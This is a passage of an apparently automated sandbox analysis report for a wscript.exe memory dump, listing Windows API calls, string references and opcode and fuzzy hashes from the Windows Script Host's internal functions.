                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db096f3f416c239daeb8de51b0f1d53f33d6a542f127fe922e6062443bcebd00
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92110671D10208EBCF10DBB9D9486AEBBF4FF68314F56086AD402E7250EB309A04EB40
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID:
• String ID: WScript.CreateObject
• API String ID: 0-1366894974
APIs
• CLSIDFromProgID.OLE32(?,?), ref: 0059090E
• CoCreateInstance.OLE32(?,00000000,00000015,00583860,?), ref: 00590998
  • Part of subcall function 0058B1AA: CreateErrorInfo.OLEAUT32(00000A2C,?,?,?,?,005873FB,00583A24,WSHRemote.Execute,00000A2C), ref: 0058B1C7
  • Part of subcall function 0058B1AA: SysFreeString.OLEAUT32($:X), ref: 0058B36D
  • Part of subcall function 0058B1AA: SysFreeString.OLEAUT32(00000A2C), ref: 0058B376
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: CreateFreeString$ErrorFromInfoInstanceProg
• String ID: WScript.CreateObject
• API String ID: 3168253046-1366894974
APIs
• FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,00000000,00596DAD,00000000,00000000,00596FF4,00000000,00000000,00000000,?,00000000,?), ref: 00596D84
• LoadResource.KERNEL32(00000000,00000000), ref: 00596D92
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: Resource$FindLoad
• String ID: MUI
• API String ID: 2619053042-1339004836
APIs
• GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951E5
• HeapFree.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951EC
• GetProcessHeap.KERNEL32(00000000,005810C4,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 0059520B
• HeapAlloc.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 00595212
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
APIs
• CreateBindCtx.OLE32(00000000,?), ref: 00589DCE
• SysFreeString.OLEAUT32(00000000), ref: 00589E84
• SysAllocStringByteLen.OLEAUT32(00000000,?), ref: 00589EEE
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: String$AllocBindByteCreateFree
• String ID:
• API String ID: 3716443497-0
APIs
• GetLocaleInfoW.KERNEL32(00000404,00000008,?,00000020,00000000), ref: 005970A9
• wcsncmp.MSVCRT ref: 005970BE
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: InfoLocalewcsncmp
• String ID:
• API String ID: 4128031126-0
APIs
• CoGetMalloc.OLE32(00000001,?,00000000,00000000,?), ref: 00588A04
• LoadRegTypeLib.OLEAUT32(005839F4,00000001,00000000,00000000,?), ref: 00588A24
• RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 00588A78
• StringFromCLSID.OLE32(?,?), ref: 00588AA2
• SysFreeString.OLEAUT32(?), ref: 00588C1A
• StringFromCLSID.OLE32(?,?), ref: 00588C71
• SysStringLen.OLEAUT32(?), ref: 00588CDB
• sprintf_s.MSVCRT ref: 00588D04
• RegOpenKeyA.ADVAPI32(?,?,?), ref: 00588D1E
• RegQueryValueA.ADVAPI32(?,Version,?,?), ref: 00588D4D
• RegDeleteKeyA.ADVAPI32(?,LocalServer32), ref: 00588D7B
• RegDeleteKeyA.ADVAPI32(?,TypeLib), ref: 00588D8C
• RegDeleteKeyA.ADVAPI32(?,Version), ref: 00588D99
• RegDeleteKeyA.ADVAPI32(?,ProgID), ref: 00588DAA
• RegCloseKey.ADVAPI32(?), ref: 00588DB6
• RegDeleteKeyA.ADVAPI32(?,?), ref: 00588DC6
• RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 00588DDA
• RegDeleteKeyA.ADVAPI32(?,CLSID), ref: 00588DEF
• RegCloseKey.ADVAPI32(?), ref: 00588DFB
• RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 00588E03
• RegCloseKey.ADVAPI32(?), ref: 00588E11
• UnRegisterTypeLib.OLEAUT32(005839F4,00000001,00000000,00000000,00000001), ref: 00588E3D
• RegCloseKey.ADVAPI32(00000000), ref: 00588F44
• SysFreeString.OLEAUT32(?), ref: 00588F50
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: Delete$String$Close$Open$FreeFromType$LoadMallocQueryRegisterValuesprintf_s
• String ID: $1.0$CLSID$LocalServer32$ProgID$TypeLib$Version
• API String ID: 418931453-1178591435
                                                                                                                                                                                                                      • Opcode ID: 9b42a82e88f4b83993c78eda5d3cf513973d79ae7fd09d92d8deba319fe24eac
                                                                                                                                                                                                                      • Instruction ID: 478ea4c56518e69e2e591da746cbd40eb5102f59045a53af8004c5e8bdaf3219
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b42a82e88f4b83993c78eda5d3cf513973d79ae7fd09d92d8deba319fe24eac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08F19274A002249FDB24AF68DC89B6D7BB9FF48700F5140EAEA09A7261CF319D85DF50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0058D0D8
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0058D11D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFreeHandleLibrary
                                                                                                                                                                                                                      • String ID: SCRIPT$SaferCloseLevel$SaferComputeTokenFromLevel$SaferIdentifyLevel$SaferRecordEventLogEntry$advapi32.dll
                                                                                                                                                                                                                      • API String ID: 10933145-3460866070
                                                                                                                                                                                                                      • Opcode ID: e6958e2dfbc21a485ccbfce3841181baecca10a1215f647070c18d0dce8f0044
                                                                                                                                                                                                                      • Instruction ID: 155112b2d1efb5e7e37875e91aa78ac412b4d1f1af2e03028c1f8b15ace5c9ca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6958e2dfbc21a485ccbfce3841181baecca10a1215f647070c18d0dce8f0044
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8813E75A103199BDB20AF29DC49B9EBBF5BF84300F1100AAE949B7290DB719D85DF21
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(ScriptFile,Path,00583AF4,?,00000104), ref: 00595E83
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000400,00000001), ref: 00595E99
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000400,00000001), ref: 00595EA5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharErrorLastMultiPrivateProfileStringWide
                                                                                                                                                                                                                      • String ID: Path$ScriptFile
                                                                                                                                                                                                                      • API String ID: 3760252266-3888212790
                                                                                                                                                                                                                      • Opcode ID: 7c3f6b374cf00ecf74eab164b470cdf6cbbf7f806af6a729750ed657db61d0c0
                                                                                                                                                                                                                      • Instruction ID: e1d6b0cbbfc5d1d6248b5bb4e8e8f9c9a8c6b19dac49faa237e5e72b4a452cbb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c3f6b374cf00ecf74eab164b470cdf6cbbf7f806af6a729750ed657db61d0c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2141A2B1611716BEFF212B769C0EE7B3E6CFF95720B11052ABD11E6180EA61CC1087B1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00592196: GetACP.KERNEL32(00000000,005810C4,0058A948,?,00000000,00000000), ref: 005921A4
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(kernel32.dll,00000000,00000800), ref: 0058A9A5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 0058A9BB
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0058A9CC
                                                                                                                                                                                                                        • Part of subcall function 00589456: SysAllocString.OLEAUT32(?), ref: 00589534
                                                                                                                                                                                                                        • Part of subcall function 00589456: SysFreeString.OLEAUT32(?), ref: 005897B0
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0058A9F8
                                                                                                                                                                                                                      • CoRegisterMessageFilter.OLE32(00000000,00000008), ref: 0058AA41
                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00000105), ref: 0058AA70
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary$String$AddressAllocFileFilterLoadMessageModuleNameProcRegister
                                                                                                                                                                                                                      • String ID: 0zX$0zX$HeapSetInformation$Open2$W$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 1008295733-356740519
                                                                                                                                                                                                                      • Opcode ID: 3017f3d8c59e14a85dce371562675f2e4e9c06390dc5cb33826fbf5857d234e1
                                                                                                                                                                                                                      • Instruction ID: 7bcdefe7c9eea464d3179ef68dc9333252253e880c6d3997b303348c14269126
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3017f3d8c59e14a85dce371562675f2e4e9c06390dc5cb33826fbf5857d234e1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AF1C2702053819FEB20AF28C88976A7FE5BF94304F15085EED86E7292DB749C49DB47
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,?,00000A2C,00000000,0058B25F,?,?,?,?), ref: 0058B68F
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000A2C,00000000,0058B25F,?,?,?,?,?,005873FB,00583A24,WSHRemote.Execute,00000A2C), ref: 0058B69D
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?,?,?,?), ref: 0058B6C4
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0058B6D0
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?,?,?,?), ref: 0058B6EB
                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B707
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B71A
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?,?,?,?,?,005873FB), ref: 0058B72F
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B749
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0058B757
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B774
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B783
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$Local$AllocFormatFreeMessage$ErrorLastString__alloca_probe_16
                                                                                                                                                                                                                      • String ID: $:X
                                                                                                                                                                                                                      • API String ID: 4105800338-2149331089
                                                                                                                                                                                                                      • Opcode ID: 8763a3922d10b1ec2ba7804a225cc886fbad880ed4ea0bc2bb0c18d6fce6c57f
                                                                                                                                                                                                                      • Instruction ID: 64a190a3ba316fe1bd6142c9ed6b4b66be1edf7d3b3a6ce328a5f4680690d0c4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8763a3922d10b1ec2ba7804a225cc886fbad880ed4ea0bc2bb0c18d6fce6c57f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18414F75901626BBEF215B6A8C4CEEF7F7CFF46361F15412AB815E21A0DB308904DBA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(0zX,00000000,-00000001,0zX,005810C4), ref: 0058A4A1
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0058A4AD
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0058A4C1
                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(0zX,00000000,00000000), ref: 0058A4CE
                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,00583BE0,?,00000001), ref: 0058A4E6
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0zX,000000FF,00000000,00000000,00000000,00000000,-00000001,0zX,005810C4), ref: 0058A522
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0058A532
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0zX,000000FF,?,00000000,00000000,00000000), ref: 0058A54F
                                                                                                                                                                                                                      • GetFileVersionInfoSizeA.VERSION(?,00000000,?,00000000,00000000,00000000), ref: 0058A562
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0058A572
                                                                                                                                                                                                                      • GetFileVersionInfoA.VERSION(?,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000), ref: 0058A57F
                                                                                                                                                                                                                      • VerQueryValueA.VERSION(?,00583BE4,?,00000001,?,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000), ref: 0058A59B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileInfoVersion$__alloca_probe_16$ByteCharMultiQuerySizeValueWide$ErrorLast
                                                                                                                                                                                                                      • String ID: 0zX
                                                                                                                                                                                                                      • API String ID: 467288509-1800041528
APIs
  • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
• SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 005941EA
• SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00594209
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 005942B3
• SafeArrayPutElement.OLEAUT32(?,?,?), ref: 005942CF
• VariantClear.OLEAUT32(?), ref: 005942DB
• SysAllocString.OLEAUT32(?), ref: 0059431F
• SafeArrayPutElement.OLEAUT32(?,?,?), ref: 00594343
• VariantClear.OLEAUT32(?), ref: 0059434F
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: ArraySafe$AllocClearCreateElementStringVariant$malloc
• String ID: (=X
• API String ID: 2320673430-3326566194
APIs
• RegQueryValueExW.ADVAPI32(00000000,Enabled,00000000,?,?,?,00000000,00000000,Enabled), ref: 00595C99
• WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,Enabled), ref: 00595CE0
• GetLastError.KERNEL32 ref: 00595CEC
• __alloca_probe_16.LIBCMT ref: 00595CF6
• WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,?,00000000,00000000,00000000), ref: 00595D0E
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,00000000,00000000,Enabled), ref: 00595D4E
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000400), ref: 00595DB2
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: ByteCharMultiWide$QueryValue$ErrorLast__alloca_probe_16
• String ID: Enabled$false
• API String ID: 421531244-109718029
APIs
• GetClassInfoA.USER32(00000000,WSH-Timer,?), ref: 0058FD34
• RegisterClassA.USER32(?), ref: 0058FD60
• SetEvent.KERNEL32(?), ref: 0058FD6E
• GetLastError.KERNEL32 ref: 0058FD74
• CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000001,00000001,00000000,00000000,?), ref: 0058FD94
• SetEvent.KERNEL32(?), ref: 0058FDA6
• DispatchMessageA.USER32(?), ref: 0058FDB7
• GetMessageA.USER32(?,?,00000000,00000000), ref: 0058FDC5
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: ClassEventMessage$CreateDispatchErrorInfoLastRegisterWindow
• String ID: WSH-Timer
• API String ID: 2425405920-2323048385
APIs
• RegOpenKeyExA.ADVAPI32(80000000,WSFFile,00000000,0002001F,00000000,0zX,00000000,?,0058A8DE,00000000), ref: 0058A6FA
• RegOpenKeyExA.ADVAPI32(00000000,Scriptuser,00000000,00020019,0058A8DE,Open2,?,0058A8DE,00000000), ref: 0058A71C
• RegCloseKey.ADVAPI32(0058A8DE,?,0058A8DE,00000000), ref: 0058A72B
• RegCloseKey.ADVAPI32(00000000,?,0058A8DE,00000000), ref: 0058A773
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: CloseOpen
• String ID: 0zX$Open2$Scriptuser$Shell$WSFFile
• API String ID: 47109696-2659566962
APIs
• GetProcAddress.KERNEL32(?,WinVerifyTrust), ref: 0058CB63
• GetLastError.KERNEL32 ref: 0058CB6F
• GetLastError.KERNEL32 ref: 0058CBC3
• FreeLibrary.KERNEL32(?,00000000,005810C4,00000000), ref: 0058CBE1
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: ErrorLast$AddressFreeLibraryProc
• String ID: ($4$WinVerifyTrust$wintrust.dll
• API String ID: 1171437518-2532474036
APIs
  • Part of subcall function 005951D4: GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951E5
  • Part of subcall function 005951D4: HeapFree.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951EC
  • Part of subcall function 005951D4: GetProcessHeap.KERNEL32(00000000,005810C4,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 0059520B
  • Part of subcall function 005951D4: HeapAlloc.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 00595212
• VariantClear.OLEAUT32(?), ref: 0059166E
• VariantClear.OLEAUT32(?), ref: 00591679
• SafeArrayGetElement.OLEAUT32(?,?,?), ref: 0059168A
• SysAllocString.OLEAUT32(null), ref: 005916B1
• VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 005916D6
• VariantClear.OLEAUT32(?), ref: 0059176B
• VariantClear.OLEAUT32(?), ref: 00591776
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: Variant$ClearHeap$AllocProcess$ArrayChangeElementFreeSafeStringType
• String ID: null
• API String ID: 2181487673-634125391
                                                                                                                                                                                                                      • Opcode ID: a0913428d737321c458801f8166c632cb5110c57a21fbc6095900b5003e69efa
                                                                                                                                                                                                                      • Instruction ID: 846604023d4a016059758f5e06b1ab5b3c3c1ad1bf9c80adf3ea01f9ef437fc5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0913428d737321c458801f8166c632cb5110c57a21fbc6095900b5003e69efa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67418F769047639BCB01DFA4D98496ABBE8FF88B50F450A2EF941D7250EB30D904C796
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00591CD0
                                                                                                                                                                                                                      • wcscpy_s.MSVCRT ref: 00591CEC
                                                                                                                                                                                                                      • wcscat_s.MSVCRT ref: 00591CF9
                                                                                                                                                                                                                      • SetErrorInfo.OLEAUT32(00000000,00000000), ref: 00591EB3
                                                                                                                                                                                                                        • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00591E10
                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00591E43
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00591F0C
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 00591F3E
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00591F4C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: StringVariant$Free$AllocClearCopyErrorInfoInitmallocwcscat_swcscpy_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3780719979-0
                                                                                                                                                                                                                      • Opcode ID: 7916008eda9c6d95cfa14d678deddc31980e1dcc25584f6b6f06c3b29a84e705
                                                                                                                                                                                                                      • Instruction ID: 3d7946f2592320ef1a3835eefc7bf777e247184dea70ac64eaaf483a3fc343ea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7916008eda9c6d95cfa14d678deddc31980e1dcc25584f6b6f06c3b29a84e705
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35C18D75E0062AAFCF14CF98D884AAEBFB5FF48710F25456AE905AB350D730AD41CB94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00592AFB,00000104,?,?,00000104,?,?,?,?,?), ref: 005950EC
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 005950FA
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00592AFB,000000FF,00000000,00000000,00000000,00000000,00000104,?,?,?,?,?), ref: 00595121
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0059512D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharErrorFullLastMultiNamePathWide__alloca_probe_16
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 187176378-0
                                                                                                                                                                                                                      • Opcode ID: cc522d97b1228261820925ce9cd1fe6bd72a89346dce72667fa42a345af69d35
                                                                                                                                                                                                                      • Instruction ID: 1a2736dda38ca7d85421c5025d64ff1e1891b8889159fb4c6dc6ba1541e708ee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc522d97b1228261820925ce9cd1fe6bd72a89346dce72667fa42a345af69d35
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F310635601526BB9F225F6A8C4CEAB7F6CFF86364B01411AB919D6250DA308E05D7F0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 005897B0
                                                                                                                                                                                                                        • Part of subcall function 005899DC: CoCreateInstance.OLE32(00583980,00000000,00000017,00583BD0,p4Y,00000000,005810C4,00000001,005810C4,?,005894CB,-00000001,0zX), ref: 00589A0A
                                                                                                                                                                                                                        • Part of subcall function 0058FDD5: GetCurrentThreadId.KERNEL32 ref: 0058FE04
                                                                                                                                                                                                                        • Part of subcall function 005950BE: GetFullPathNameW.KERNEL32(00592AFB,00000104,?,?,00000104,?,?,?,?,?), ref: 005950EC
                                                                                                                                                                                                                        • Part of subcall function 005950BE: GetLastError.KERNEL32 ref: 005950FA
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00589534
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00589554
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Alloc$CreateCurrentErrorFreeFullInstanceLastNamePathThread
                                                                                                                                                                                                                      • String ID: .wsf$0zX
                                                                                                                                                                                                                      • API String ID: 1820159607-2156800361
                                                                                                                                                                                                                      • Opcode ID: f652ab40085e2da85ba4863c06ca3cc8fa84db34200fa118e9b8773dfd54e264
                                                                                                                                                                                                                      • Instruction ID: 9ffc76ca84c99edda2fe39645fe3000462a5f95beaa66d05ceb598c688b1b98e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f652ab40085e2da85ba4863c06ca3cc8fa84db34200fa118e9b8773dfd54e264
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C91A3707002169BDB20BF69D898BBE7BE9BF99304F180069E905F7251EA34AD458B90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058F2AB
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058F2B4
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058F2BD
